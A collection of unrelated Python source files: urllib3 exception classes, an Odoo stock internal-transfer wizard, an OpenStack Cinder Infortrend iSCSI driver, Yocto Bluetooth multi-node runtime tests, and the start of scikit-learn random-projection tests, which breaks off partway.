    def __repr__(self) -> str:
        return (
            "IncompleteRead(%i bytes read, %i more expected)"
            % (self.partial, self.expected)
        )
class InvalidChunkLength(HTTPError, httplib_IncompleteRead):
    """Invalid chunk length in a chunked response."""

    def __init__(self, response: "HTTPResponse", length: bytes) -> None:
        self.response = response
        self.length = length
        self.partial: int = response.tell()
        self.expected: Optional[int] = response.length_remaining

    def __repr__(self) -> str:
        return (
            "InvalidChunkLength(got length %r, %i bytes read)"
            % (self.length, self.partial)
        )
class InvalidHeader(HTTPError):
    """The header provided was somehow invalid."""
class ProxySchemeUnknown(AssertionError, URLSchemeUnknown):
    """ProxyManager does not support the supplied scheme"""

    # TODO(t-8ch): Stop inheriting from AssertionError in v2.0.

    def __init__(self, scheme: Optional[str]) -> None:
        # Our URL parser turns "localhost:8080" into scheme="localhost";
        # treat that the same as a missing scheme until the parser is fixed.
        if scheme == "localhost":
            scheme = None
        if scheme is None:
            message = "Proxy URL had no scheme, should start with http:// or https://"
        else:
            message = f"Proxy URL had unsupported scheme {scheme}, should use http:// or https://"
        super().__init__(message)
class ProxySchemeUnsupported(ValueError):
    """Fetching HTTPS resources through HTTPS proxies is unsupported"""
class HeaderParsingError(HTTPError):
    """Raised by assert_header_parsing, but we convert it to a log.warning statement."""

    def __init__(
        self, defects: List[MessageDefect], unparsed_data: Optional[Union[bytes, str]]
    ) -> None:
        super().__init__(
            "{}, unparsed data: {!r}".format(defects or "Unknown", unparsed_data)
        )
class UnrewindableBodyError(HTTPError):
    """urllib3 encountered an error when trying to rewind a body"""
|
|
from openerp import netsvc
from openerp import models, fields, api
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from datetime import datetime
from openerp.osv import osv
import time
class wizard_stock_internal_transfer(models.TransientModel):
    """Wizard that confirms the send/receive step of an internal transfer.

    Validates the entered quantities against the transfer lines, creates a
    backorder transfer for any remaining quantity, builds the matching
    stock picking and moves, and pushes the transfer through its workflow
    ('action_send' when draft, 'action_receive' when already sent).
    """
    _name = 'wizard.stock.internal.transfer'

    transfer_id = fields.Many2one('stock.internal.transfer', 'Transfer')
    item_ids = fields.One2many('stock.internal.transfer.items', 'transfer_id', 'Items')

    def default_get(self, cr, uid, fields, context=None):
        """Prefill the wizard lines from the active stock.internal.transfer.

        Locations depend on the transfer state:
        draft -> source warehouse stock to the company transit location,
        send  -> transit location to the destination warehouse stock.
        """
        if context is None: context = {}
        res = super(wizard_stock_internal_transfer, self).default_get(cr, uid, fields, context=context)
        transfer_ids = context.get('active_ids', [])
        active_model = context.get('active_model')
        if not transfer_ids or len(transfer_ids) != 1:
            # Partial Picking Processing may only be done for one picking at a time
            return res
        # BUG FIX: ('stock.internal.transfer') is just a string, so the old
        # `in` test was a substring check; use a real one-element tuple.
        assert active_model in ('stock.internal.transfer',), 'Bad context propagation'
        transfer_id, = transfer_ids
        transfers = self.pool.get('stock.internal.transfer').browse(cr, uid, transfer_id, context=context)
        company_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.id
        company = self.pool.get('res.company').browse(cr, uid, company_id)
        items = []
        if not company.transit_location_id:
            raise osv.except_osv(_('Error!'), _('Please setup your stock transit location in Setting - Internal Transfer Configuration'))
        # NOTE(review): states other than 'draft'/'send' leave the location
        # variables unset and fail below -- confirm the wizard is only opened
        # in those two states.
        if transfers.state == 'draft':
            source_location_id = transfers.source_warehouse_id.lot_stock_id.id
            dest_location_id = company.transit_location_id.id
        elif transfers.state == 'send':
            source_location_id = company.transit_location_id.id
            dest_location_id = transfers.dest_warehouse_id.lot_stock_id.id
        for transfer in transfers.line_ids:
            item = {
                'product_id': transfer.product_id.id,
                'product_uom_id': transfer.product_uom_id.id,
                'product_qty': transfer.product_qty,
                'source_location_id': source_location_id,
                'dest_location_id' : dest_location_id,
            }
            if transfer.product_id:
                items.append(item)
        res.update(item_ids=items)
        return res

    def button_confirm(self, cr, uid, ids, context):
        """Validate quantities and execute the send or receive step."""
        # BUG FIX: wkf_service used to be defined only at the END of each
        # branch, but the 'send' branch calls trg_validate on the backorder
        # before that point, raising NameError. Define it once up front.
        wkf_service = netsvc.LocalService('workflow')
        for tf in self.browse(cr, uid, ids):
            if 'active_ids' in context:
                transfer = self.pool.get('stock.internal.transfer').browse(cr, uid, context.get('active_ids')[0])
                if transfer.state == 'draft':
                    backorders = []
                    user_list = []
                    # Only users attached to the source warehouse may send.
                    user_ids = transfer.source_warehouse_id.user_ids
                    if user_ids :
                        for user in user_ids :
                            user_list.append(user.id)
                        if uid not in user_list:
                            raise osv.except_osv(_('Warning !'),_('You are not authorized to send or receive products !'))
                    for line in tf.item_ids:
                        for trans in transfer.line_ids:
                            if line.product_id.id == trans.product_id.id:
                                if line.product_qty > trans.product_qty:
                                    raise osv.except_osv(_('Error!'), _('You have exceed the available product quantity.'))
                                elif line.product_qty < trans.product_qty:
                                    # Partial quantity: queue a backorder line
                                    # for the remainder and shrink the original.
                                    backorder = {
                                        'product_id' : line.product_id.id,
                                        'product_qty' : trans.product_qty - line.product_qty,
                                        'product_uom_id' : line.product_uom_id.id,
                                        'state' : 'draft',
                                    }
                                    backorders.append(backorder)
                                    self.pool.get('stock.internal.transfer.line').write(cr, uid, trans.id, {
                                        'product_qty' : line.product_qty
                                    })
                    if backorders:
                        create_id = self.pool.get('stock.internal.transfer').create(cr, uid, {
                            'date' : time.strftime('%Y-%m-%d %H:%M:%S'),
                            'source_location_id' : transfer.source_location_id.id,
                            'dest_location_id' : transfer.dest_location_id.id,
                            'backorder_id' : context.get('active_ids')[0],
                            'state' : 'draft',
                        })
                        for backorder in backorders:
                            backorder['transfer_id'] = create_id
                            self.pool.get('stock.internal.transfer.line').create(cr, uid, backorder)
                    # Build the outgoing picking from the source warehouse.
                    type_obj = self.pool.get('stock.picking.type')
                    type_ids = type_obj.search(cr, uid, [('default_location_src_id', '=', transfer.source_warehouse_id.lot_stock_id.id),
                                                        ('code', '=', 'outgoing')])
                    if type_ids:
                        types = type_obj.browse(cr, uid, type_ids[0])
                        picking_obj = self.pool.get('stock.picking')
                        picking_id = picking_obj.create(cr, uid, {
                            'picking_type_id' : types.id,
                            'transfer_id' : context.get('active_ids')[0]
                        })
                    else:
                        raise osv.except_osv(_('Error!'), _('Unable to find source location in Stock Picking.'))
                    move_obj = self.pool.get('stock.move')
                    for line in tf.item_ids:
                        move_obj.create(cr,uid,{
                            'name' : 'Stock Internal Transfer',
                            'product_id' : line.product_id.id,
                            'product_uom' : line.product_uom_id.id,
                            'product_uom_qty' : line.product_qty,
                            'location_id' : line.source_location_id.id,
                            'location_dest_id' : line.dest_location_id.id,
                            'picking_id' : picking_id,
                        })
                    picking_obj = self.pool.get('stock.picking')
                    picking_obj.action_confirm(cr, uid, picking_id)
                    picking_obj.action_assign(cr, uid, picking_id)
                    picking_obj.do_internal_transfer_details(cr, uid, picking_id)
                    wkf_service.trg_validate(uid, 'stock.internal.transfer', context.get('active_ids')[0], 'action_send', cr)
                elif transfer.state == 'send':
                    backorders = []
                    user_list = []
                    # Only users attached to the destination warehouse may receive.
                    user_ids = transfer.dest_warehouse_id.user_ids
                    if user_ids :
                        for user in user_ids :
                            user_list.append(user.id)
                        if uid not in user_list:
                            raise osv.except_osv(_('Warning !'),_('You are not authorized to send or receive products !'))
                    for line in tf.item_ids:
                        for trans in transfer.line_ids:
                            if line.product_id.id == trans.product_id.id:
                                if line.product_qty > trans.product_qty:
                                    raise osv.except_osv(_('Error!'), _('You have exceed the available product quantity.'))
                                elif line.product_qty < trans.product_qty:
                                    backorder = {
                                        'product_id' : line.product_id.id,
                                        'product_qty' : trans.product_qty - line.product_qty,
                                        'product_uom_id' : line.product_uom_id.id,
                                        'state' : 'draft',
                                    }
                                    backorders.append(backorder)
                    if backorders:
                        create_id = self.pool.get('stock.internal.transfer').create(cr, uid, {
                            'date' : time.strftime('%Y-%m-%d %H:%M:%S'),
                            'source_location_id' : transfer.source_location_id.id,
                            'dest_location_id' : transfer.dest_location_id.id,
                            'backorder_id' : context.get('active_ids')[0],
                            'state' : 'send',
                        })
                        for backorder in backorders:
                            backorder['transfer_id'] = create_id
                            self.pool.get('stock.internal.transfer.line').create(cr, uid, backorder)
                        # Push the backorder transfer into the 'send' step too.
                        wkf_service.trg_validate(uid, 'stock.internal.transfer', create_id, 'action_send', cr)
                    # Build the incoming picking at the destination warehouse.
                    type_obj = self.pool.get('stock.picking.type')
                    type_ids = type_obj.search(cr, uid, [('default_location_dest_id', '=', transfer.dest_warehouse_id.lot_stock_id.id),
                                                        ('code', '=', 'incoming')])
                    if type_ids:
                        types = type_obj.browse(cr, uid, type_ids[0])
                        picking_obj = self.pool.get('stock.picking')
                        picking_id = picking_obj.create(cr, uid, {
                            'picking_type_id' : types.id,
                            'transfer_id' : context.get('active_ids')[0]
                        })
                    else:
                        raise osv.except_osv(_('Error!'), _('Unable to find destination location in Stock Picking.'))
                    move_obj = self.pool.get('stock.move')
                    for line in tf.item_ids:
                        move_obj.create(cr,uid,{
                            'name' : 'Stock Internal Transfer',
                            'product_id' : line.product_id.id,
                            'product_uom' : line.product_uom_id.id,
                            'product_uom_qty' : line.product_qty,
                            'location_id' : line.source_location_id.id,
                            'location_dest_id' : line.dest_location_id.id,
                            'picking_id' : picking_id,
                        })
                    picking_obj = self.pool.get('stock.picking')
                    picking_obj.action_confirm(cr, uid, picking_id)
                    picking_obj.action_assign(cr, uid, picking_id)
                    picking_obj.do_internal_transfer_details(cr, uid, picking_id)
                    wkf_service.trg_validate(uid, 'stock.internal.transfer', context.get('active_ids')[0], 'action_receive', cr)
        return True

    @api.multi
    def wizard_view(self):
        """Return the act_window that re-opens this wizard's form view."""
        view = self.env.ref('sgeede_internal_transfer.wizard_stock_internal_transfer_view')
        return {
            'name': _('Enter Transfer Details'),
            'type': 'ir.actions.act_window',
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'wizard.stock.internal.transfer',
            'views': [(view.id, 'form')],
            'view_id': view.id,
            'target': 'new',
            'res_id': self.ids[0],
            'context': self.env.context,
        }
class stock_internal_transfer_items(models.TransientModel):
    """One product line of the stock internal-transfer wizard."""
    _name = 'stock.internal.transfer.items'

    # Link back to the parent wizard record.
    transfer_id = fields.Many2one('wizard.stock.internal.transfer', 'Transfer')
    product_id = fields.Many2one('product.product', 'Product')
    product_qty = fields.Float('Quantity')
    product_uom_id = fields.Many2one('product.uom', 'Unit of Measure')
    source_location_id = fields.Many2one('stock.location', 'Source Location')
    transit_location_id = fields.Many2one('stock.location', 'Transit Location')
    dest_location_id = fields.Many2one('stock.location', 'Destination Location')

    def product_id_change(self, cr, uid, ids, product_id, context=None):
        """Propagate the default UoM of the newly selected product.

        @param product_id: id of the changed product (falsy when cleared)
        @return: onchange dictionary updating ``product_uom_id``
        """
        if not product_id:
            # Product cleared: reset the unit of measure as well.
            return {'value': {'product_uom_id': False}}
        product = self.pool.get('product.product').browse(
            cr, uid, product_id, context=context)
        uom_id = product.uom_id.id if product.uom_id else False
        return {'value': {'product_uom_id': uom_id}}
|
|
# Copyright (c) 2015 Infortrend Technology, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
iSCSI Driver for Infortrend Eonstor based on CLI.
"""
from oslo_log import log as logging
from cinder.volume import driver
from cinder.volume.drivers.infortrend.eonstor_ds_cli import common_cli
LOG = logging.getLogger(__name__)
class InfortrendCLIISCSIDriver(driver.ISCSIDriver):

    """Infortrend iSCSI Driver for Eonstor DS using CLI.

    Thin delegation layer: every operation logs its arguments and then
    forwards to ``common_cli.InfortrendCommon``, which performs the actual
    array communication over the CLI.

    Version history:
        1.0.0 - Initial driver
        1.0.1 - Support DS4000
    """

    def __init__(self, *args, **kwargs):
        super(InfortrendCLIISCSIDriver, self).__init__(*args, **kwargs)
        # Shared backend helper; 'iSCSI' selects the protocol-specific paths.
        self.common = common_cli.InfortrendCommon(
            'iSCSI', configuration=self.configuration)
        self.VERSION = self.common.VERSION

    def check_for_setup_error(self):
        # Validate backend configuration; raises on misconfiguration.
        LOG.debug('check_for_setup_error start')
        self.common.check_for_setup_error()

    def create_volume(self, volume):
        """Creates a volume.

        Can optionally return a Dictionary of changes
        to the volume object to be persisted.
        """
        LOG.debug('create_volume volume id=%(volume_id)s', {
            'volume_id': volume['id']})
        return self.common.create_volume(volume)

    def create_volume_from_snapshot(self, volume, snapshot):
        """Creates a volume from a snapshot."""
        LOG.debug(
            'create_volume_from_snapshot volume id=%(volume_id)s '
            'snapshot id=%(snapshot_id)s', {
                'volume_id': volume['id'], 'snapshot_id': snapshot['id']})
        return self.common.create_volume_from_snapshot(volume, snapshot)

    def create_cloned_volume(self, volume, src_vref):
        """Creates a clone of the specified volume."""
        LOG.debug(
            'create_cloned_volume volume id=%(volume_id)s '
            'src_vref provider_location=%(provider_location)s', {
                'volume_id': volume['id'],
                'provider_location': src_vref['provider_location']})
        return self.common.create_cloned_volume(volume, src_vref)

    def extend_volume(self, volume, new_size):
        """Extend a volume.

        :param new_size: new size in GB
        """
        LOG.debug(
            'extend_volume volume id=%(volume_id)s new size=%(size)s', {
                'volume_id': volume['id'], 'size': new_size})
        self.common.extend_volume(volume, new_size)

    def delete_volume(self, volume):
        """Deletes a volume."""
        LOG.debug('delete_volume volume id=%(volume_id)s', {
            'volume_id': volume['id']})
        return self.common.delete_volume(volume)

    def migrate_volume(self, ctxt, volume, host):
        """Migrate the volume to the specified host.

        Returns a boolean indicating whether the migration occurred, as well as
        model_update.

        :param ctxt: Context
        :param volume: A dictionary describing the volume to migrate
        :param host: A dictionary describing the host to migrate to, where
                     host['host'] is its name, and host['capabilities'] is a
                     dictionary of its reported capabilities.
        """
        LOG.debug('migrate_volume volume id=%(volume_id)s host=%(host)s', {
            'volume_id': volume['id'], 'host': host['host']})
        return self.common.migrate_volume(volume, host)

    def create_snapshot(self, snapshot):
        """Creates a snapshot."""
        LOG.debug(
            'create_snapshot snapshot id=%(snapshot_id)s '
            'volume_id=%(volume_id)s', {
                'snapshot_id': snapshot['id'],
                'volume_id': snapshot['volume_id']})
        return self.common.create_snapshot(snapshot)

    def delete_snapshot(self, snapshot):
        """Deletes a snapshot."""
        LOG.debug(
            'delete_snapshot snapshot id=%(snapshot_id)s '
            'volume_id=%(volume_id)s', {
                'snapshot_id': snapshot['id'],
                'volume_id': snapshot['volume_id']})
        self.common.delete_snapshot(snapshot)

    def ensure_export(self, context, volume):
        """Synchronously recreates an export for a volume."""
        # Intentionally a no-op for this backend.
        pass

    def create_export(self, context, volume):
        """Exports the volume.

        Can optionally return a Dictionary of changes
        to the volume object to be persisted.
        """
        LOG.debug(
            'create_export volume provider_location=%(provider_location)s', {
                'provider_location': volume['provider_location']})
        return self.common.create_export(context, volume)

    def remove_export(self, context, volume):
        """Removes an export for a volume."""
        # Intentionally a no-op for this backend.
        pass

    def initialize_connection(self, volume, connector):
        """Initializes the connection and returns connection information.

        The iscsi driver returns a driver_volume_type of 'iscsi'.
        The format of the driver data is defined in _get_iscsi_properties.
        Example return value::

            {
                'driver_volume_type': 'iscsi'
                'data': {
                    'target_discovered': True,
                    'target_iqn': 'iqn.2010-10.org.openstack:volume-00000001',
                    'target_portal': '127.0.0.1:3260',
                    'volume_id': 1,
                    'access_mode': 'rw'
                }
            }
        """
        LOG.debug(
            'initialize_connection volume id=%(volume_id)s '
            'connector initiator=%(initiator)s', {
                'volume_id': volume['id'],
                'initiator': connector['initiator']})
        return self.common.initialize_connection(volume, connector)

    def terminate_connection(self, volume, connector, **kwargs):
        """Disallow connection from connector."""
        LOG.debug('terminate_connection volume id=%(volume_id)s', {
            'volume_id': volume['id']})
        self.common.terminate_connection(volume, connector)

    def get_volume_stats(self, refresh=False):
        """Get volume stats.

        If 'refresh' is True, run update the stats first.
        """
        LOG.debug('get_volume_stats refresh=%(refresh)s', {
            'refresh': refresh})
        return self.common.get_volume_stats(refresh)

    def manage_existing(self, volume, existing_ref):
        """Manage an existing lun in the array.

        The lun should be in a manageable pool backend, otherwise
        error would return.
        Rename the backend storage object so that it matches the,
        volume['name'] which is how drivers traditionally map between a
        cinder volume and the associated backend storage object.

        existing_ref:{
            'id':lun_id
        }
        """
        # NOTE(review): the docstring shows key 'id' but the code reads
        # 'source-id' -- callers must supply 'source-id'; confirm upstream.
        LOG.debug(
            'manage_existing volume id=%(volume_id)s '
            'existing_ref source id=%(source_id)s', {
                'volume_id': volume['id'],
                'source_id': existing_ref['source-id']})
        return self.common.manage_existing(volume, existing_ref)

    def unmanage(self, volume):
        """Removes the specified volume from Cinder management.

        Does not delete the underlying backend storage object.

        :param volume: Cinder volume to unmanage
        """
        LOG.debug('unmanage volume id=%(volume_id)s', {
            'volume_id': volume['id']})
        self.common.unmanage(volume)

    def manage_existing_get_size(self, volume, existing_ref):
        """Return size of volume to be managed by manage_existing.

        When calculating the size, round up to the next GB.
        """
        LOG.debug(
            'manage_existing_get_size volume id=%(volume_id)s '
            'existing_ref source id=%(source_id)s', {
                'volume_id': volume['id'],
                'source_id': existing_ref['source-id']})
        return self.common.manage_existing_get_size(volume, existing_ref)

    def retype(self, ctxt, volume, new_type, diff, host):
        """Convert the volume to be of the new type.

        :param ctxt: Context
        :param volume: A dictionary describing the volume to migrate
        :param new_type: A dictionary describing the volume type to convert to
        :param diff: A dictionary with the difference between the two types
        :param host: A dictionary describing the host to migrate to, where
                     host['host'] is its name, and host['capabilities'] is a
                     dictionary of its reported capabilities.
        """
        LOG.debug(
            'retype volume id=%(volume_id)s new_type id=%(type_id)s', {
                'volume_id': volume['id'], 'type_id': new_type['id']})
        return self.common.retype(ctxt, volume, new_type, diff, host)

    def update_migrated_volume(self, ctxt, volume, new_volume,
                               original_volume_status):
        """Return model update for migrated volume.

        :param volume: The original volume that was migrated to this backend
        :param new_volume: The migration volume object that was created on
                           this backend as part of the migration process
        :param original_volume_status: The status of the original volume
        :return model_update to update DB with any needed changes
        """
        LOG.debug(
            'update migrated volume original volume id= %(volume_id)s '
            'new volume id=%(new_volume_id)s', {
                'volume_id': volume['id'], 'new_volume_id': new_volume['id']})
        return self.common.update_migrated_volume(ctxt, volume, new_volume,
                                                  original_volume_status)
|
|
import os
import time
import subprocess
from oeqa.runtime.bluetooth import bluetooth
from oeqa.oetest import oeRuntimeTest
from oeqa.utils.helper import shell_cmd_timeout
from oeqa.utils.helper import get_files_dir
class CommBTTestMNode(oeRuntimeTest):
    """
    @class CommBTTestMNode
    Multi-node bluetooth tests: two targets (targets[0] and targets[1])
    exercise GATT reads, classic/LE scanning, LE advertising and pairing
    against each other, driven from the host via ssh and expect scripts.
    """
    @classmethod
    def setUpClass(cls):
        '''Copy gatttool to /tmp/ folder
        @fn setUpClass
        @param cls
        @return
        '''
        bt1=bluetooth.BTFunction(cls.tc.targets[0])
        bt2=bluetooth.BTFunction(cls.tc.targets[1])
        # NOTE(review): gatttool is copied to targets[0] only, yet chmod runs
        # on both targets -- presumably targets[1] already has the binary;
        # confirm, otherwise the second chmod acts on a missing file.
        copy_to_path = os.path.join(get_files_dir(), 'gatttool')
        cls.tc.targets[0].copy_to(copy_to_path, "/tmp/")
        bt1.target.run('chmod +x /tmp/gatttool')
        bt2.target.run('chmod +x /tmp/gatttool')

    def setUp(self):
        """
        @fn setUp
        @param self
        @return
        Re-initialise hci0 on both targets before every test so each case
        starts from a known adapter state.
        """
        self.bt1 = bluetooth.BTFunction(self.targets[0])
        self.bt2 = bluetooth.BTFunction(self.targets[1])
        self.bt1.target_hciconfig_init()
        self.bt2.target_hciconfig_init()

    def test_bt_gatt_read_primary(self):
        '''Use gatttool to show remote primary attr handles
        @fn test_bt_gatt_read_primary
        @param self
        @return
        '''
        # Retry up to 3 times; a zero status from gatt_basic_check means the
        # primary-service listing succeeded.
        for i in range(3):
            self.bt2.target_hciconfig_init()
            self.bt2.set_leadv()
            (status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'primary')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool Primary is wrong: %s" % output)

    def test_bt_gatt_read_characteristics(self):
        '''Use gatttool to show target characteristics handles
        @fn test_bt_gatt_read_characteristics
        @param self
        @return
        '''
        for i in range(3):
            self.bt2.target_hciconfig_init()
            self.bt2.set_leadv()
            (status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'characteristics')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool characteristics fails: %s" % output)

    def test_bt_gatt_read_handle(self):
        '''Use gatttool to read target handle value
        @fn test_bt_gatt_read_handle
        @param self
        @return
        '''
        for i in range(3):
            self.bt2.target_hciconfig_init()
            self.bt2.set_leadv()
            (status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'handle')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool read handle fails: %s" % output)

    def test_bt_gatt_connect(self):
        '''Use gatttool interactive mode to do connect
        @fn test_bt_gatt_connect
        @param self
        @return
        '''
        # NOTE(review): for the 'connect' check an exit status of 2 is treated
        # as success (unlike 0 for the read checks) -- apparently the expect
        # script's convention; confirm in gatt_basic_check.
        for i in range(3):
            self.bt2.target_hciconfig_init()
            self.bt2.set_leadv()
            (status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'connect')
            if status == 2:
                break
        self.assertEqual(status, 2, msg="gatttool connect fails: %s" % output)

    def test_bt_remote_gatt_read_primary(self):
        '''Use gatttool to show host primary attr handles
        @fn test_bt_remote_gatt_read_primary
        @param self
        @return
        '''
        # Same as test_bt_gatt_read_primary with the two targets' roles swapped.
        for i in range(3):
            self.bt1.target_hciconfig_init()
            self.bt1.set_leadv()
            (status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'primary')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool be read primary fails: %s" % output)

    def test_bt_remote_gatt_read_characteristics(self):
        '''Use gatttool to show host characteristics handles
        @fn test_bt_remote_gatt_read_characteristics
        @param self
        @return
        '''
        for i in range(3):
            self.bt1.target_hciconfig_init()
            self.bt1.set_leadv()
            (status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'characteristics')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool be read characteristics fails: %s" % output)

    def test_bt_remote_gatt_read_handle(self):
        '''Use gatttool to read host handle value
        @fn test_bt_remote_gatt_read_handle
        @param self
        @return
        '''
        for i in range(3):
            self.bt1.target_hciconfig_init()
            self.bt1.set_leadv()
            (status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'handle')
            if status == 0:
                break
        self.assertEqual(status, 0, msg="gatttool be read handle fails: %s" % output)

    def test_bt_remote_gatt_connect(self):
        '''Use gatttool interactive mode to do connect to host
        @fn test_bt_remote_gatt_connect
        @param self
        @return
        '''
        for i in range(3):
            self.bt1.target_hciconfig_init()
            self.bt1.set_leadv()
            (status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'connect')
            if status == 2:
                break
        self.assertEqual(status, 2, msg="gatttool be connected fails: %s" % output)

    def test_bt_visible(self):
        '''Do traditional visible and be scanned by other (not ble scan)
        @fn test_bt_visible
        @param self
        @return
        '''
        # Disable LE advertising so only classic (BR/EDR) visibility is tested.
        self.bt1.target.run('hciconfig hci0 noleadv')
        for i in range(3):
            # For init function already set visible status, directly be scanned.
            exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
            cmd = "expect %s %s %s" % (exp, self.bt2.target.ip, self.bt1.get_bt_mac())
            status, output = shell_cmd_timeout(cmd, timeout=100)
            if status == 2:
                break
        if type(output) is bytes:
            output = output.decode("ascii")
        self.assertEqual(status, 2, msg="Scan remote device fails: %s" % output)

    def test_bt_scan(self):
        '''Scan nearby bluetooth devices (not ble scan)
        @fn test_bt_scan
        @param self
        @return
        '''
        # Mirror of test_bt_visible with scanner and advertiser swapped.
        self.bt2.target.run('hciconfig hci0 noleadv')
        for i in range(3):
            # For init function already set visible status, directly be scanned.
            exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
            cmd = "expect %s %s %s" % (exp, self.bt1.target.ip, self.bt2.get_bt_mac())
            status, output = shell_cmd_timeout(cmd, timeout=100)
            if status == 2:
                break
        if type(output) is bytes:
            output = output.decode("ascii")
        self.assertEqual(status, 2, msg="Scan remote device fails: %s" % output)

    def test_bt_le_advertising(self):
        '''Target does LE advertising, another device scans it
        @fn test_bt_le_advertising
        @param self
        @return
        '''
        for i in range(3):
            # close legacy iscan mode
            self.bt1.target.run('hciconfig hci0 noscan')
            # begin low-energy scan
            self.bt1.target.run('hciconfig hci0 leadv')
            time.sleep(1)
            # Another device starts bluetoothctl to scan target
            exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
            cmd = "expect %s %s %s" % (exp, self.bt2.target.ip, self.bt1.get_bt_mac())
            status, output = shell_cmd_timeout(cmd, timeout=100)
            if status == 2:
                break
            else:
                # Scan failed: reset the adapter and retry after a pause.
                self.bt1.target.run('hciconfig hci0 reset')
                time.sleep(3)
        if type(output) is bytes:
            output = output.decode("ascii")
        self.assertEqual(status, 2, msg="Be LE-scanned fails: %s" % output)

    def test_bt_le_scan(self):
        '''Another device (host) does LE advertising, target scans it
        @fn test_bt_le_scan
        @param self
        @return
        '''
        for i in range(3):
            # close legacy iscan mode
            self.bt2.target.run('hciconfig hci0 noscan')
            # begin low-energy scan
            self.bt2.target.run('hciconfig hci0 leadv')
            time.sleep(1)
            # Device starts bluetoothctl to scan others
            exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
            cmd = "expect %s %s %s" % (exp, self.bt1.target.ip, self.bt2.get_bt_mac())
            status, output = shell_cmd_timeout(cmd, timeout=100)
            if status == 2:
                break
            else:
                self.bt2.target.run('hciconfig hci0 reset')
                time.sleep(3)
        # NOTE(review): this test decodes as utf-8 while the scan tests above
        # use ascii -- the suite should standardise on one encoding.
        if type(output) is bytes:
            output = output.decode("utf-8")
        self.assertEqual(status, 2, msg="LE Scan other fails: %s" % output)

    def test_bt_pairing(self):
        '''Use bluetoothctl to pair IoT device with host
        @fn test_bt_pairing
        @param self
        @return
        '''
        # On remote, start pair_slave in back-ground
        # NOTE(review): unlike every other invocation, this command does not
        # prefix "expect" -- presumably the .exp file is executable with a
        # shebang; confirm, otherwise the slave side never starts.
        slave_exp = os.path.join(os.path.dirname(__file__), "files/bt_pair_slave_on_iot.exp")
        cmd = "%s %s %s" % (slave_exp, self.bt2.target.ip, self.bt1.get_bt_mac())
        subprocess.Popen(cmd, shell=True)
        # On target, perform pair_master
        master_exp = os.path.join(os.path.dirname(__file__), "files/bt_pair_master.exp")
        cmd = "expect %s %s %s" % (master_exp, self.bt1.target.ip, self.bt2.get_bt_mac())
        for i in range(3):
            (status, output) = shell_cmd_timeout(cmd, timeout=200)
            if status == 2:
                break
        if type(output) is bytes:
            output = output.decode("utf-8")
        self.assertEqual(status, 2, msg="expect excution fail: %s" % output)
        # On target, check paired devices to see if IoT is in
        check_exp = os.path.join(os.path.dirname(__file__), "files/bt_list_paired_device.exp")
        (status, output) = shell_cmd_timeout("%s %s | grep '^Device %s'" % (check_exp, self.bt1.target.ip, self.bt2.get_bt_mac()), timeout=20)
        self.assertEqual(status, 0, msg="Not found IoT device paired")
##
# @}
# @}
##
|
|
import functools
from typing import List, Any
import numpy as np
import scipy.sparse as sp
import pytest
from sklearn.metrics import euclidean_distances
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import _gaussian_random_matrix
from sklearn.random_projection import _sparse_random_matrix
from sklearn.random_projection import SparseRandomProjection
from sklearn.random_projection import GaussianRandomProjection
from sklearn.utils._testing import assert_raises
from sklearn.utils._testing import assert_raise_message
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_warns
from sklearn.exceptions import DataDimensionalityWarning
# Registries of every matrix generator / projection class under test, so each
# property check below can be run against all implementations of a given role.
all_sparse_random_matrix: List[Any] = [_sparse_random_matrix]
all_dense_random_matrix: List[Any] = [_gaussian_random_matrix]
all_random_matrix = all_sparse_random_matrix + all_dense_random_matrix
all_SparseRandomProjection: List[Any] = [SparseRandomProjection]
all_DenseRandomProjection: List[Any] = [GaussianRandomProjection]
all_RandomProjection = set(all_SparseRandomProjection +
                           all_DenseRandomProjection)
def make_sparse_random_data(n_samples, n_features, n_nonzeros):
    """Build a random matrix with uniformly located non-zero entries holding
    Gaussian-distributed values.

    Returns the same data twice: as a dense ndarray and as a CSR matrix.
    Seeded with RandomState(0), so repeated calls are deterministic.
    """
    rng = np.random.RandomState(0)
    values = rng.randn(n_nonzeros)
    row_idx = rng.randint(n_samples, size=n_nonzeros)
    col_idx = rng.randint(n_features, size=n_nonzeros)
    data_coo = sp.coo_matrix((values, (row_idx, col_idx)),
                             shape=(n_samples, n_features))
    return data_coo.toarray(), data_coo.tocsr()
def densify(matrix):
    """Return *matrix* as a dense ndarray, converting only when sparse."""
    return matrix.toarray() if sp.issparse(matrix) else matrix
# Shared module-level fixture: a 10 x 1000 matrix with ~1% non-zero entries,
# available both dense (``data``) and CSR (``data_csr``).
n_samples, n_features = (10, 1000)
n_nonzeros = int(n_samples * n_features / 100.)
data, data_csr = make_sparse_random_data(n_samples, n_features, n_nonzeros)
###############################################################################
# test on JL lemma
###############################################################################
def test_invalid_jl_domain():
